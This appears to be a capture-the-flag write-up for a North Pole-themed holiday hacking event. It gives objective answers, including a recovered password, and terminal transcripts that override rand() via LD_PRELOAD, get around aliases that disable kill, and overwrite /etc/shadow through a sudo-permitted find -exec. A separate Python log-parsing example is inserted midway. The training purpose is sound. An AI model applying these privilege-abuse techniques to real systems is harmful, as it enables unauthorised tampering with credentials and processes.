  1. Visit the North Pole and Beyond at the Winter Wonder Landing Level to collect the first page of The Great Book using a giant snowball.

    1. What is the title of that page? About This Book (Page 1)
  2. Investigate the Letters to Santa application at https://l2s.northpolechristmastown.com.

    1. What is the topic of The Great Book page available in the web root of the server? On The Topic of Flying Animals (Page 2)
    2. What is Alabaster Snowball’s password? stream_unhappy_buy_loss
  3. The North Pole engineering team uses a Windows SMB server for sharing documentation and correspondence. Using your access to the Letters to Santa server, identify and enumerate the SMB file-sharing server.

    1. What is the file server share name? FileStor
  4. Elf Web Access (EWA) is the preferred mailer for North Pole elves, available internally at http://mail.northpolechristmastown.com.

    1. What can you learn from The Great Book page found in an e-mail on that server? Munchkin Moles infiltrated the elves.
  5. Naughty and Nice List

    1. How many infractions are required to be marked as naughty on Santa’s Naughty and Nice List? Four infractions are required
    2. What are the names of at least six insider threat moles? Nina Fitzgerald, Kirsty Evans, Isabel Mehta, Christy Srivastava, Sheri Lewis, Beverly Khalil
    3. Who is throwing the snowballs from the top of the North Pole Mountain? Abominable Snow Monster
    4. What is your proof? Chatlog
  6. The North Pole engineering team has introduced an Elf as a Service (EaaS) platform to optimize resource allocation for mission-critical Christmas engineering projects at http://eaas.northpolechristmastown.com. Visit the system and retrieve instructions for accessing The Great Book page from C:\greatbook.txt. Then retrieve The Great Book PDF file by following those directions.

    1. What is the title of The Great Book page? The Abominable Snow Monster (Page 5)
  7. Like any other complex SCADA systems, the North Pole uses Elf-Machine Interfaces (EMI) to monitor and control critical infrastructure assets. These systems serve many uses, including email access and web browsing. Gain access to the EMI server through the use of a phishing attack with your access to the EWA server. Retrieve The Great Book page from C:\GreatBookPage7.pdf.

    1. What does The Great Book page describe? Regarding the Witches of Oz - the witches of Oz remained neutral during the Great Schism.
  8. Fetch the letter to Santa from the North Pole Elf Database at http://edb.northpolechristmastown.com.

    1. Who wrote the letter? The Wizard of Oz
    2. Which character is ultimately the villain causing the giant snowball problem? Glinda, the Good Witch
    3. What is the villain’s motive? All-out War between Oz and the North Pole.

Achievements

Terminal Challenges

Wunorse Openslae

                 .--._.--.--.__.--.--.__.--.--.__.--.--._.--.
               _(_      _Y_      _Y_      _Y_      _Y_      _)_
              [___]    [___]    [___]    [___]    [___]    [___]
              /:' \    /:' \    /:' \    /:' \    /:' \    /:' \
             |::   |  |::   |  |::   |  |::   |  |::   |  |::   |
             \::.  /  \::.  /  \::.  /  \::.  /  \::.  /  \::.  /
         jgs  \::./    \::./    \::./    \::./    \::./    \::./
               '='      '='      '='      '='      '='      '='
Wunorse Openslae has a special challenge for you.
Run the given binary, make it return 42.
Use the partial source for hints, it is just a clue.
You will need to write your own code, but only a line or two.
total 88
-rwxr-xr-x 1 root root 84824 Dec 16 16:59 isit42
-rw-r--r-- 1 root root   654 Dec 16 16:57 isit42.c.un
elf@444800d15214:~$ 
elf@444800d15214:~$ ./isit42 
Starting up ... done.
Calling rand() to select a random number.
653 is not 42.
elf@444800d15214:~$ cat isit42.c.un 
#include <stdio.h>
// DATA CORRUPTION ERROR
// MUCH OF THIS CODE HAS BEEN LOST
// FORTUNATELY, YOU DON'T NEED IT FOR THIS CHALLENGE
// MAKE THE isit42 BINARY RETURN 42
// YOU'LL NEED TO WRITE A SEPERATE C SOURCE TO WIN EVERY TIME
int getrand() {
    srand((unsigned int)time(NULL)); 
    printf("Calling rand() to select a random number.\n");
    // The prototype for rand is: int rand(void);
    return rand() % 4096; // returns a pseudo-random integer between 0 and 4096
}
int main() {
    sleep(3);
    int randnum = getrand();
    if (randnum == 42) {
        printf("Yay!\n");
    } else {
        printf("Boo!\n");
    }
    return randnum;
}

elf@947cdc075ec8:~/src$ gcc desrand.c -o desrand.so -DLINUX -ldl -shared -fPIC
elf@947cdc075ec8:~$ LD_PRELOAD=src/desrand.so isit42 
Starting up ... done.
Calling rand() to select a random number.
                 .-. 
                .;;\ ||           _______  __   __  _______    _______  __    _  _______  _     _  _______  ______ 
               /::::\|/          |       ||  | |  ||       |  |   _   ||  |  | ||       || | _ | ||       ||    _ |
              /::::'();          |_     _||  |_|  ||    ___|  |  |_|  ||   |_| ||  _____|| || || ||    ___||   | ||
            |\/`\:_/`\/|           |   |  |       ||   |___   |       ||       || |_____ |       ||   |___ |   |_||_ 
        ,__ |0_..().._0| __,       |   |  |       ||    ___|  |       ||  _    ||_____  ||       ||    ___||    __  |
         \,`////""""\\\\`,/        |   |  |   _   ||   |___   |   _   || | |   | _____| ||   _   ||   |___ |   |  | |
         | )//_ o  o _\\( |        |___|  |__| |__||_______|  |__| |__||_|  |__||_______||__| |__||_______||___|  |_|
          \/|(_) () (_)|\/ 
            \   '()'   /            ______    _______  _______  ___      ___      __   __    ___   _______ 
            _:.______.;_           |    _ |  |       ||   _   ||   |    |   |    |  | |  |  |   | |       |
          /| | /`\/`\ | |\         |   | ||  |    ___||  |_|  ||   |    |   |    |  |_|  |  |   | |  _____|
         / | | \_/\_/ | | \        |   |_||_ |   |___ |       ||   |    |   |    |       |  |   | | |_____ 
        /  |o`""""""""`o|  \       |    __  ||    ___||       ||   |___ |   |___ |_     _|  |   | |_____  |
       `.__/     ()     \__.'      |   |  | ||   |___ |   _   ||       ||       |  |   |    |   |  _____| |
       |  | ___      ___ |  |      |___|  |_||_______||__| |__||_______||_______|  |___|    |___| |_______|
       /  \|---|    |---|/  \ 
       |  (|42 | () | DA|)  |       _   ___  _______ 
       \  /;---'    '---;\  /      | | |   ||       |
        `` \ ___ /\ ___ / ``       | |_|   ||____   |
            `|  |  |  |`           |       | ____|  |
      jgs    |  |  |  |            |___    || ______| ___ 
       _._  |\|\/||\/|/|  _._          |   || |_____ |   |
      / .-\ |~~~~||~~~~| /-. \         |___||_______||___|
      | \__.'    ||    '.__/ |
       `---------''---------` 
Congratulations! You've won, and have successfully completed this challenge.

Sugarplum Mary

                       *
                      .~'
                     O'~..
                    ~'O'~..
                   ~'O'~..~'
                  O'~..~'O'~.
                 .~'O'~..~'O'~
                ..~'O'~..~'O'~.
               .~'O'~..~'O'~..~'
              O'~..~'O'~..~'O'~..
             ~'O'~..~'O'~..~'O'~..
            ~'O'~..~'O'~..~'O'~..~'
           O'~..~'O'~..~'O'~..~'O'~.
          .~'O'~..~'O'~..~'O'~..~'O'~
         ..~'O'~..~'O'~..~'O'~..~'O'~.
        .~'O'~..~'O'~..~'O'~..~'O'~..~'
       O'~..~'O'~..~'O'~..~'O'~..~'O'~..
      ~'O'~..~'O'~..~'O'~..~'O'~..~'O'~..
     ~'O'~..~'O'~..~'O'~..~'O'~..~'O'~..~'
    O'~..~'O'~..~'O'~..~'O'~..~'O'~..~'O'~.
   .~'O'~..~'O'~..~'O'~..~'O'~..~'O'~..~'O'~
  ..~'O'~..~'O'~..~'O'~..~'O'~..~'O'~..~'O'~.
 .~'O'~..~'O'~..~'O'~..~'O'~..~'O'~..~'O'~..~'
O'~..~'O'~..~'O'~..~'O'~..~'O'~..~'O'~..~'O'~..
Sugarplum Mary is in a tizzy, we hope you can assist.
Christmas songs abound, with many likes in our midst.
The database is populated, ready for you to address.
Identify the song whose popularity is the best.
total 20684
-rw-r--r-- 1 root root 15982592 Nov 29 19:28 christmassongs.db
-rwxr-xr-x 1 root root  5197352 Dec  7 15:10 runtoanswer
elf@e3de726ef55e:~$ sqlite3 christmassongs.db 'select * from songs where id = (select songid from likes group by songid order by sum(like) desc limit 1);'
392|Stairway to Heaven|Led Zeppelin|1971|"Stairway to Heaven" is a song by the English rock band Led Zeppelin, released in late 1971. It was composed by guitarist Jimmy Page and vocalist Robert Plant for the band's untitled fourth studio album (often called Led Zeppelin IV). It is often referred to as one of the greatest rock songs of all time.
elf@e3de726ef55e:~$ ./runtoanswer 
Starting up, please wait......
Enter the name of the song with the most likes: Stairway to Heaven
That is the #1 Christmas song, congratulations!

Sparkle Redberry

                ___,@
               /  <
          ,_  /    \  _,
      ?    \`/______\`/
   ,_(_).  |; (e  e) ;|
    \___ \ \/\   7  /\/    _\8/_
        \/\   \'=='/      | /| /|
         \ \___)--(_______|//|//|
          \___  ()  _____/|/_|/_|
             /  ()  \    `----'
            /   ()   \
           '-.______.-'
   jgs   _    |_||_|    _
        (@____) || (____@)
         \______||______/
My name is Sparkle Redberry, and I need your help.
My server is atwist, and I fear I may yelp.
Help me kill the troublesome process gone awry.
I will return the favor with a gift before nigh.
Kill the "santaslittlehelperd" process to complete this challenge.
elf@3cef0de4aad2:~$ alias
alias alert='notify-send --urgency=low -i "$([ $? = 0 ] && echo terminal || echo error)" "$(history|tail -n1|sed -e '\''s/^\s*[0-9]\+\s*//;s/[;&|]\s*alert$//'\'')"'
alias egrep='egrep --color=auto'
alias fgrep='fgrep --color=auto'
alias grep='grep --color=auto'
alias kill='true'
alias killall='true'
alias l='ls -CF'
alias la='ls -A'
alias ll='ls -alF'
alias ls='ls --color=auto'
alias pkill='true'
alias skill='true'
elf@537a65d4518a:~$ alias kill=kill
elf@402db136554a:~$ ps auxf
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
elf          1  0.2  0.0  18028  2872 pts/0    Ss   12:57   0:00 /bin/bash /sbin/init
elf          8  0.0  0.0   4224   648 pts/0    S    12:57   0:00 /usr/bin/santaslittlehelperd
elf         11  0.4  0.0  13528  6364 pts/0    S    12:57   0:00 /sbin/kworker
elf         18  1.6  0.0  71468 26556 pts/0    S    12:57   0:00  \_ /sbin/kworker
elf         12  0.0  0.0  18248  3208 pts/0    S    12:57   0:00 /bin/bash
elf         41  0.0  0.0  34424  2940 pts/0    R+   12:57   0:00  \_ ps auxf
elf@402db136554a:~$ kill -9 8

Shinny Upatree

              \ /
            -->*<--
              /o\
             /_\_\
            /_/_0_\
           /_o_\_\_\
          /_/_/_/_/o\
         /@\_\_\@\_\_\
        /_/_/O/_/_/_/_\
       /_\_\_\_\_\o\_\_\
      /_/0/_/_/_0_/_/@/_\
     /_\_\_\_\_\_\_\_\_\_\
    /_/o/_/_/@/_/_/o/_/0/_\
   jgs       [___]  
My name is Shinny Upatree, and I've made a big mistake.
I fear it's worse than the time I served everyone bad hake.
I've deleted an important file, which suppressed my server access.
I can offer you a gift, if you can fix my ill-fated redress.
Restore /etc/shadow with the contents of /etc/shadow.bak, then run "inspect_da_box" to complete this challenge.
Hint: What commands can you run with sudo?
elf@5ded5c157d02:~$ /usr/bin/sudo -g shadow /usr/bin/find /etc -name shadow.bak -exec cp {} /etc/shadow \;
elf@5ded5c157d02:~$ /usr/local/bin/inspect_da_box
                     ___
                    / __'.     .-"""-.
              .-""-| |  '.'.  / .---. \
             / .--. \ \___\ \/ /____| |
            / /    \ `-.-;-(`_)_____.-'._
           ; ;      `.-" "-:_,(o:==..`-. '.         .-"-,
           | |      /       \ /      `\ `. \       / .-. \
           \ \     |         Y    __...\  \ \     / /   \/
     /\     | |    | .--""--.| .-'      \  '.`---' /
     \ \   / /     |`        \'   _...--.;   '---'`
      \ '-' / jgs  /_..---.._ \ .'\\_     `.
       `--'`      .'    (_)  `'/   (_)     /
                  `._       _.'|         .'
                     ```````    '-...--'`
/etc/shadow has been successfully restored!

Pepper Minstix

                             ______
                          .-"""".._'.       _,##
                   _..__ |.-"""-.|  |   _,##'`-._
                  (_____)||_____||  |_,##'`-._,##'`
                  _|   |.;-""-.  |  |#'`-._,##'`
               _.;_ `--' `\    \ |.'`\._,##'`
              /.-.\ `\     |.-";.`_, |##'`
              |\__/   | _..;__  |'-' /
              '.____.'_.-`)\--' /'-'`
               //||\\(_.-'_,'-'`
             (`-...-')_,##'`
      jgs _,##`-..,-;##`
       _,##'`-._,##'`
    _,##'`-._,##'`
      `-._,##'`
My name is Pepper Minstix, and I need your help with my plight.
I've crashed the Christmas toy train, for which I am quite contrite.
I should not have interfered, hacking it was foolish in hindsight.
If you can get it running again, I will reward you with a gift of delight.
total 444
-rwxr-xr-x 1 root root 454636 Dec  7 18:43 trainstartup
elf@d04e67d2f54c:~$ qemu-arm trainstartup



    Merry Christmas
    Merry Christmas
v
>*<
^
/o\
/   \               @.·
/~~   \                .
/ ° ~~  \         · .    
/      ~~ \       ◆  ·    
/     °   ~~\    ·     0
/~~           \   .─··─ · o
             /°  ~~  .*· · . \  ├──┼──┤                                        
              │  ──┬─°─┬─°─°─°─ └──┴──┘                                        
≠==≠==≠==≠==──┼──=≠     ≠=≠==≠==≠==≠==≠==≠==≠==≠==≠==≠==≠==≠==≠==≠==≠==≠==≠===≠
              │   /└───┘\┌───┐       ┌┐                                        
                         └───┘    /▒▒▒▒                      ▒                 
≠==≠==≠==≠==≠==≠==≠==≠==≠==≠==≠==≠=°≠=°≠==≠==≠==≠==≠==≠==≠==≠=▒▒▒▒ ==≠==≠==≠==≠
You did it! Thank you!

Minty Candycane

                           ._    _.
                           (_)  (_)                  <> \  / <>
                            .\::/.                   \_\/  \/_/ 
           .:.          _.=._\\//_.=._                  \\//
      ..   \o/   ..      '=' //\\ '='             _<>_\_\<>/_/_<>_
      :o|   |   |o:         '/::\'                 <> / /<>\ \ <>
       ~ '. ' .' ~         (_)  (_)      _    _       _ //\\ _
           >O<             '      '     /_/  \_\     / /\  /\ \
       _ .' . '. _                        \\//       <> /  \ <>
      :o|   |   |o:                   /\_\\><//_/\
      ''   /o\   ''     '.|  |.'      \/ //><\\ \/
           ':'        . ~~\  /~~ .       _//\\_
jgs                   _\_._\/_._/_      \_\  /_/ 
                       / ' /\ ' \                   \o/
       o              ' __/  \__ '              _o/.:|:.\o_
  o    :    o         ' .'|  |'.                  .\:|:/.
    '.\'/.'                 .                 -=>>::>o<::<<=-
    :->@<-:                 :                   _ '/:|:\' _
    .'/.\'.           '.___/*\___.'              o\':|:'/o 
  o    :    o           \* \ / */                   /o\
       o                 >--X--<
                        /*_/ \_*\
                      .'   \*/   '.
                            :
                            '
Minty Candycane here, I need your help straight away.
We're having an argument about browser popularity stray.
Use the supplied log file from our server in the North Pole.
Identifying the least-popular browser is your noteworthy goal.
total 28704
-rw-r--r-- 1 root root 24191488 Dec  4 17:11 access.log
-rwxr-xr-x 1 root root  5197336 Dec 11 17:31 runtoanswer
elf@7b909dd6611c:~$ awk -F\" '{print $6}' access.log | sort | uniq -c | sort -fr
  27285 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36
...
      1 Dillo/3.0.5
      1 curl/7.35.0

elf@7b909dd6611c:~$ ./runtoanswer 
Starting up, please wait......
Enter the name of the least popular browser in the web log: Dillo/3.0.5
That is the least common browser in the web log! Congratulations!
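The awk one-liner above relies on the user agent always being the sixth quote-delimited field, which shifts as soon as a referer or request contains an escaped quote. The following added example (not part of the original write-up) parses combined-format lines with a regex instead, counts user agents, reports lines it could not parse, and makes ties for the least popular agent visible. The log lines are constructed samples, not the challenge's access.log.

```python
import re
from collections import Counter

# Constructed sample in Apache/nginx combined format. Line 4 carries an escaped
# quote in the referer, which would break a naive split on '"'; line 6 has no
# user agent at all; line 7 is deliberately malformed.
SAMPLE_LOG = """\
10.0.0.1 - - [04/Dec/2017:17:11:02 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36"
10.0.0.2 - - [04/Dec/2017:17:11:03 +0000] "GET /index.html HTTP/1.1" 200 612 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36"
10.0.0.3 - - [04/Dec/2017:17:11:04 +0000] "GET /robots.txt HTTP/1.1" 404 169 "-" "curl/7.35.0"
10.0.0.4 - - [04/Dec/2017:17:11:05 +0000] "GET / HTTP/1.1" 200 612 "http://example.test/\\"q\\"" "Dillo/3.0.5"
10.0.0.5 - - [04/Dec/2017:17:11:06 +0000] "GET / HTTP/1.1" 200 612 "-" "curl/7.35.0"
10.0.0.6 - - [04/Dec/2017:17:11:07 +0000] "GET / HTTP/1.1" 200 612 "-" "-"
this line is not a log entry
"""

# Quoted fields may contain backslash-escaped characters, including \" .
QUOTED = r'(?:[^"\\]|\\.)*'
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>' + QUOTED + r')" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>' + QUOTED + r')" "(?P<agent>' + QUOTED + r')"\s*$'
)


def user_agent_counts(lines):
    """Return (Counter of user agents, number of lines that did not parse)."""
    counts = Counter()
    unparsed = 0
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            unparsed += 1      # count rather than silently skip malformed input
            continue
        counts[m.group("agent")] += 1
    return counts, unparsed


def least_popular(lines):
    """User agents tied for the lowest count, sorted; '-' (no agent) is excluded."""
    counts, _ = user_agent_counts(lines)
    counts.pop("-", None)
    if not counts:
        return []
    low = min(counts.values())
    return sorted(ua for ua, n in counts.items() if n == low)


if __name__ == "__main__":
    counts, bad = user_agent_counts(SAMPLE_LOG.splitlines())
    for ua, n in counts.most_common():
        print(f"{n:7d} {ua}")
    print(f"unparsed lines: {bad}; least popular: {least_popular(SAMPLE_LOG.splitlines())}")
```

On the constructed sample, the awk field split prints an empty string for the Dillo line, whereas the regex attributes it correctly.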

Holly Evergreen

                     ___
                    / __'.     .-"""-.
              .-""-| |  '.'.  / .---. \
             / .--. \ \___\ \/ /____| |
            / /    \ `-.-;-(`_)_____.-'._
           ; ;      `.-" "-:_,(o:==..`-. '.         .-"-,
           | |      /       \ /      `\ `. \       / .-. \
           \ \     |         Y    __...\  \ \     / /   \/
     /\     | |    | .--""--.| .-'      \  '.`---' /
     \ \   / /     |`        \'   _...--.;   '---'`
      \ '-' / jgs  /_..---.._ \ .'\\_     `.
       `--'`      .'    (_)  `'/   (_)     /
                  `._       _.'|         .'
                     ```````    '-...--'`
My name is Holly Evergreen, and I have a conundrum.
I broke the candy cane striper, and I'm near throwing a tantrum.
Assembly lines have stopped since the elves can't get their candy cane fix.
We hope you can start the striper once again, with your vast bag of tricks.
Run the CandyCaneStriper executable to complete this challenge.
elf@9d94c6300de0:~$
elf@9d94c6300de0:~$ /lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 /home/elf/CandyCaneStriper 
                   _..._
                 .'\\ //`,      
                /\\.'``'.=",
               / \/     ;==|
              /\\/    .'\`,`
             / \/     `""`
            /\\/
           /\\/
          /\ /
         /\\/
        /`\/
        \\/
         `
The candy cane striping machine is up and running!
elf@9d94c6300de0:~$ 

Bushy Evergreen

                                 |
                               \ ' /
                             -- (*) --
                                >*<
                               >0<@<
                              >>>@<<*
                             >@>*<0<<<
                            >*>>@<<<@<<
                           >@>>0<<<*<<@<
                          >*>>0<<@<<<@<<<
                         >@>>*<<@<>*<<0<*<
           \*/          >0>>*<<@<>0><<*<@<<
       ___\\U//___     >*>>@><0<<*>>@><*<0<<
       |\\ | | \\|    >@>>0<*<0>>@<<0<<<*<@<<  
       | \\| | _(UU)_ >((*))_>0><*<0><@<<<0<*<
       |\ \| || / //||.*.*.*.|>>@<<*<<@>><0<<<
       |\\_|_|&&_// ||*.*.*.*|_\\db//_               
       """"|'.'.'.|~~|.*.*.*|     ____|_
           |'.'.'.|   ^^^^^^|____|>>>>>>|
           ~~~~~~~~         '""""`------'
My name is Bushy Evergreen, and I have a problem for you.
I think a server got owned, and I can only offer a clue.
We use the system for chat, to keep toy production running.
Can you help us recover from the server connection shunning?
Find and run the elftalkd binary to complete this challenge.
elf@9c19b504d83c:~$ 
elf@9c19b504d83c:~$ ls -d -1 /**/* | grep -i elftalk
/run/elftalk
elf@9c19b504d83c:~$ ls /run/elftalk/bin/elftalkd 
/run/elftalk/bin/elftalkd
elf@9c19b504d83c:~$ /run/elftalk/bin/elftalkd